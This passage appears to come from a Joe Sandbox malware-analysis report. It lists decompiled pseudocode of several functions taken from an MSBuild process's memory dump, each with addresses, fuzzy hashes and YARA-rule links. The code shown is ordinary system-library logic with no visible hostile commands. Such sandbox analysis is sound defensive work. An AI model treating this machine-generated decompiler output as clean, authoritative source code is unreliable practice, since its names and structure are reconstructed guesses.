				_t83 = (_v44 -  *0x1198b04 >> 0x14) + (_v44 -  *0x1198b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E010C7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0116138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E010C7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0115FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1198724 & 0x00000008) != 0) {
						E011652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E011715B5(0x1198ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                0x01170eb7
                                                                                                0x01170eb9
                                                                                                0x01170ec0
                                                                                                0x01170ec2
                                                                                                0x01170ecd
                                                                                                0x0117105b
                                                                                                0x0117105b
                                                                                                0x01171061
                                                                                                0x01171066
                                                                                                0x01171066
                                                                                                0x0117106b
                                                                                                0x01171073
                                                                                                0x01171073
                                                                                                0x01170ed3
                                                                                                0x01170ed6
                                                                                                0x01170edc
                                                                                                0x01170ee0
                                                                                                0x01170ee7
                                                                                                0x01170ef0
                                                                                                0x01170ef5
                                                                                                0x01170efa
                                                                                                0x01170efc
                                                                                                0x01170efd
                                                                                                0x01170f03
                                                                                                0x01170f04
                                                                                                0x01170f06
                                                                                                0x01170f07
                                                                                                0x01170f09
                                                                                                0x01170f0e
                                                                                                0x01170f14
                                                                                                0x01170f23
                                                                                                0x01170f2d
                                                                                                0x01170f34
                                                                                                0x01170f34
                                                                                                0x01170f14
                                                                                                0x01170f52
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01170f58
                                                                                                0x01170f73
                                                                                                0x01170f74
                                                                                                0x01170f79
                                                                                                0x01170f7d
                                                                                                0x01170f80
                                                                                                0x01170f86
                                                                                                0x01170fab
                                                                                                0x01170fb5
                                                                                                0x01170fc6
                                                                                                0x01170fd1
                                                                                                0x01170fe3
                                                                                                0x01170fd3
                                                                                                0x01170fdc
                                                                                                0x01170fdc
                                                                                                0x01170feb
                                                                                                0x01171009
                                                                                                0x01171009
                                                                                                0x01171015
                                                                                                0x01171027
                                                                                                0x01171017
                                                                                                0x01171020
                                                                                                0x01171020
                                                                                                0x0117102f
                                                                                                0x0117103c
                                                                                                0x0117103c
                                                                                                0x01171048
                                                                                                0x01171050
                                                                                                0x01171050
                                                                                                0x01171055
                                                                                                0x00000000
                                                                                                0x01171055
                                                                                                0x01170f88
                                                                                                0x01170f9e
                                                                                                0x01170fa2
                                                                                                0x01170fa9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01170fa9
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `
                                                                                                • API String ID: 0-2679148245
                                                                                                • Opcode ID: f88df441c49cbc2d4412c515fcacf327a99c8a8ffaf8a586cb250d3372aa149f
                                                                                                • Instruction ID: 62890111070ef217f3f893bff178189a4c2fae683ed5f2845a4e30609ff17606
                                                                                                • Opcode Fuzzy Hash: f88df441c49cbc2d4412c515fcacf327a99c8a8ffaf8a586cb250d3372aa149f
                                                                                                • Instruction Fuzzy Hash: EF518C712083429BD329DF28D884B5BBBF9EBC9714F14092CFA9697390D771E905CB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010DF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 75%
                                                                                                			E010DF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E010C4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E010E9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E010E9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E010E95D0();
							goto L11;
						} else {
							_t109 = L010C4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E010EF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E010E95D0();
										L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                0x010df0d3
                                                                                                0x010df0d9
                                                                                                0x010df0e0
                                                                                                0x010df0e7
                                                                                                0x010df0f2
                                                                                                0x010df0f4
                                                                                                0x010df0f8
                                                                                                0x010df100
                                                                                                0x010df108
                                                                                                0x010df10d
                                                                                                0x010df115
                                                                                                0x010df116
                                                                                                0x010df11f
                                                                                                0x010df123
                                                                                                0x010df124
                                                                                                0x010df12c
                                                                                                0x010df130
                                                                                                0x010df134
                                                                                                0x010df13d
                                                                                                0x010df144
                                                                                                0x010df14b
                                                                                                0x010df152
                                                                                                0x0111bab0
                                                                                                0x0111bab0
                                                                                                0x010df158
                                                                                                0x010df158
                                                                                                0x010df15a
                                                                                                0x010df160
                                                                                                0x010df165
                                                                                                0x010df166
                                                                                                0x010df16f
                                                                                                0x010df173
                                                                                                0x0111baa7
                                                                                                0x0111baa7
                                                                                                0x0111baab
                                                                                                0x00000000
                                                                                                0x010df179
                                                                                                0x010df18d
                                                                                                0x010df191
                                                                                                0x0111baa2
                                                                                                0x00000000
                                                                                                0x010df197
                                                                                                0x010df19b
                                                                                                0x010df1a2
                                                                                                0x010df1a9
                                                                                                0x010df1af
                                                                                                0x010df1b2
                                                                                                0x010df1b6
                                                                                                0x010df1b9
                                                                                                0x010df1c4
                                                                                                0x010df1d8
                                                                                                0x010df1df
                                                                                                0x010df1e3
                                                                                                0x010df1eb
                                                                                                0x010df1ee
                                                                                                0x010df1f4
                                                                                                0x010df20f
                                                                                                0x0111bab7
                                                                                                0x0111babb
                                                                                                0x0111bacc
                                                                                                0x0111bad1
                                                                                                0x010df215
                                                                                                0x010df218
                                                                                                0x010df226
                                                                                                0x010df22b
                                                                                                0x00000000
                                                                                                0x010df22b
                                                                                                0x010df1f6
                                                                                                0x010df1f6
                                                                                                0x010df1f9
                                                                                                0x010df1fb
                                                                                                0x010df1fb
                                                                                                0x010df1f4
                                                                                                0x010df191
                                                                                                0x010df173
                                                                                                0x010df152
                                                                                                0x010df203

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @
                                                                                                • API String ID: 0-2766056989
                                                                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                • Instruction ID: 7f4094023681efed04020158ad2723f6d3b9b9c3483f6633facea2a5a1b407b5
                                                                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                • Instruction Fuzzy Hash: 6D5180725047119FC321DF69C840A6BBBF4FF48710F00892DF99697650E7B4E915CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01123540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 75%
                                                                                                			E01123540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x119d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E010E0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01123706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E010EFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01123540;
						E010EFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E010FDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01130C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E010E97C0();
					}
					return E010EB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01123971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01123884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E010EFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E010E9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01123787(_a4,  &_v352, _t80);
						}
					}
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E010E95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                0x01123552
                                                                                                0x0112355a
                                                                                                0x0112355d
                                                                                                0x01123566
                                                                                                0x01123567
                                                                                                0x0112357e
                                                                                                0x0112358f
                                                                                                0x011235a1
                                                                                                0x011235a5
                                                                                                0x0112366b
                                                                                                0x0112366b
                                                                                                0x0112366d
                                                                                                0x01123672
                                                                                                0x01123679
                                                                                                0x01123685
                                                                                                0x0112368d
                                                                                                0x0112369d
                                                                                                0x011236a7
                                                                                                0x011236b8
                                                                                                0x011236c6
                                                                                                0x011236c7
                                                                                                0x011236dc
                                                                                                0x011236e1
                                                                                                0x011236e7
                                                                                                0x011236e9
                                                                                                0x011236e9
                                                                                                0x01123703
                                                                                                0x01123703
                                                                                                0x011235b5
                                                                                                0x011235c0
                                                                                                0x011235c4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011235ca
                                                                                                0x011235d7
                                                                                                0x011235e2
                                                                                                0x011235e6
                                                                                                0x011235e8
                                                                                                0x011235f5
                                                                                                0x011235fa
                                                                                                0x01123603
                                                                                                0x01123604
                                                                                                0x01123609
                                                                                                0x0112360a
                                                                                                0x01123612
                                                                                                0x01123613
                                                                                                0x0112361e
                                                                                                0x01123622
                                                                                                0x01123628
                                                                                                0x0112362f
                                                                                                0x0112362f
                                                                                                0x01123636
                                                                                                0x01123638
                                                                                                0x0112363b
                                                                                                0x01123642
                                                                                                0x01123642
                                                                                                0x01123636
                                                                                                0x01123657
                                                                                                0x01123657
                                                                                                0x0112365c
                                                                                                0x01123662
                                                                                                0x01123669
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryHash
                                                                                                • API String ID: 0-2202222882
                                                                                                • Opcode ID: 0f602e2fc6bcd20671032477e78e396edd8b6d0ec67a8df8ade0793ee6f55658
                                                                                                • Instruction ID: 2b6a0c1ed96ec91c0c4cf97ee7359019c5dc203b0c8a29ff23491b236ef0b144
                                                                                                • Opcode Fuzzy Hash: 0f602e2fc6bcd20671032477e78e396edd8b6d0ec67a8df8ade0793ee6f55658
                                                                                                • Instruction Fuzzy Hash: 0C4143F1D1052D9EDF259A50CC84FDEB77CAB48718F0045A5EA58AB240DB349F988FA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 011705AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 71%
                                                                                                			E011705AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E011707DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E010E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0116A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0116A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01171293(_t79, _v40, E011707DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E010C7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0116138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                                0x011705c5
                                                                                                0x011705ca
                                                                                                0x011705d3
                                                                                                0x011706db
                                                                                                0x011706db
                                                                                                0x011706dd
                                                                                                0x011706e3
                                                                                                0x011706e3
                                                                                                0x011705dd
                                                                                                0x011705e7
                                                                                                0x011705f6
                                                                                                0x01170600
                                                                                                0x01170607
                                                                                                0x01170610
                                                                                                0x01170615
                                                                                                0x0117061a
                                                                                                0x0117061c
                                                                                                0x0117061e
                                                                                                0x01170624
                                                                                                0x01170625
                                                                                                0x01170627
                                                                                                0x01170628
                                                                                                0x01170631
                                                                                                0x01170640
                                                                                                0x0117064d
                                                                                                0x01170654
                                                                                                0x01170654
                                                                                                0x01170631
                                                                                                0x0117066d
                                                                                                0x01170674
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01170692
                                                                                                0x0117069e
                                                                                                0x011706b0
                                                                                                0x011706a0
                                                                                                0x011706a9
                                                                                                0x011706a9
                                                                                                0x011706b8
                                                                                                0x011706d6
                                                                                                0x011706d6
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `
                                                                                                • API String ID: 0-2679148245
                                                                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                • Instruction ID: 0ce0929ac78f0295a66c0e2e3c3889df27a6f5ba3b019f1e953c33972af73ce5
                                                                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                • Instruction Fuzzy Hash: F93104322043066BE714DE28CC44F9B7BE9EBC8754F144229FA54EB380D770E954CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01123884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 72%
                                                                                                			E01123884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E010E9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L010C4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E010E9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                0x01123893
                                                                                                0x01123896
                                                                                                0x01123899
                                                                                                0x0112389f
                                                                                                0x011238a0
                                                                                                0x011238a4
                                                                                                0x011238a9
                                                                                                0x011238ac
                                                                                                0x011238ad
                                                                                                0x011238ae
                                                                                                0x011238af
                                                                                                0x011238b1
                                                                                                0x011238b4
                                                                                                0x011238bb
                                                                                                0x011238bc
                                                                                                0x011238bd
                                                                                                0x011238c4
                                                                                                0x011238c8
                                                                                                0x011238ca
                                                                                                0x011238ca
                                                                                                0x011238d5
                                                                                                0x0112393e
                                                                                                0x01123940
                                                                                                0x01123942
                                                                                                0x01123952
                                                                                                0x01123954
                                                                                                0x01123961
                                                                                                0x01123961
                                                                                                0x01123967
                                                                                                0x0112396e
                                                                                                0x0112396e
                                                                                                0x01123947
                                                                                                0x0112394c
                                                                                                0x00000000
                                                                                                0x0112394c
                                                                                                0x011238ea
                                                                                                0x011238ee
                                                                                                0x011238f8
                                                                                                0x011238f9
                                                                                                0x011238ff
                                                                                                0x01123900
                                                                                                0x01123902
                                                                                                0x01123903
                                                                                                0x0112390b
                                                                                                0x0112390f
                                                                                                0x01123950
                                                                                                0x00000000
                                                                                                0x01123950
                                                                                                0x01123915
                                                                                                0x0112391d
                                                                                                0x0112391d
                                                                                                0x01123922
                                                                                                0x01123926
                                                                                                0x00000000
                                                                                                0x01123928
                                                                                                0x0112392b
                                                                                                0x0112392b
                                                                                                0x01123935
                                                                                                0x01123937
                                                                                                0x01123937
                                                                                                0x00000000
                                                                                                0x01123935
                                                                                                0x01123926
                                                                                                0x011238f0
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryName
                                                                                                • API String ID: 0-215506332
                                                                                                • Opcode ID: f6b382b0d2a6d432d0a822457aef9376061537434cbc6d7dfd7dc5132118bbc6
                                                                                                • Instruction ID: 7ed2d93828443d6966ebc7eb4b32bf86a11aae51f81d82053e138fc1ef9a7868
                                                                                                • Opcode Fuzzy Hash: f6b382b0d2a6d432d0a822457aef9376061537434cbc6d7dfd7dc5132118bbc6
                                                                                                • Instruction Fuzzy Hash: F8312972E1052AAFDF19DB5CC945EBFB774FB49B20F014129E964A7280E7349E10CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010DD294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 33%
                                                                                                			E010DD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x119d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E010C4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E010EB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E010E98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E010E95D0();
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                0x010dd29c
                                                                                                0x010dd2a6
                                                                                                0x010dd2b1
                                                                                                0x010dd2b5
                                                                                                0x010dd2b6
                                                                                                0x010dd2bc
                                                                                                0x010dd2bd
                                                                                                0x010dd2be
                                                                                                0x010dd2bf
                                                                                                0x010dd2c2
                                                                                                0x010dd2c4
                                                                                                0x010dd2cc
                                                                                                0x010dd384
                                                                                                0x010dd34b
                                                                                                0x010dd34f
                                                                                                0x010dd350
                                                                                                0x010dd351
                                                                                                0x010dd35c
                                                                                                0x010dd35c
                                                                                                0x010dd2d6
                                                                                                0x010dd2da
                                                                                                0x010dd2e1
                                                                                                0x010dd361
                                                                                                0x010dd369
                                                                                                0x010dd36d
                                                                                                0x010dd2e3
                                                                                                0x010dd2e3
                                                                                                0x010dd2e3
                                                                                                0x010dd2e5
                                                                                                0x010dd2ed
                                                                                                0x010dd2f5
                                                                                                0x010dd2fa
                                                                                                0x010dd302
                                                                                                0x010dd303
                                                                                                0x010dd30b
                                                                                                0x010dd30f
                                                                                                0x010dd313
                                                                                                0x010dd318
                                                                                                0x010dd31c
                                                                                                0x010dd320
                                                                                                0x010dd379
                                                                                                0x010dd37d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0111affe
                                                                                                0x0111b001
                                                                                                0x0111b011
                                                                                                0x00000000
                                                                                                0x010dd322
                                                                                                0x010dd322
                                                                                                0x010dd330
                                                                                                0x010dd337
                                                                                                0x010dd35d
                                                                                                0x010dd339
                                                                                                0x010dd33f
                                                                                                0x010dd38c
                                                                                                0x010dd38c
                                                                                                0x010dd33f
                                                                                                0x010dd349
                                                                                                0x00000000
                                                                                                0x010dd349

                                                                                                Strings
                                                                                                Memory Dump Source
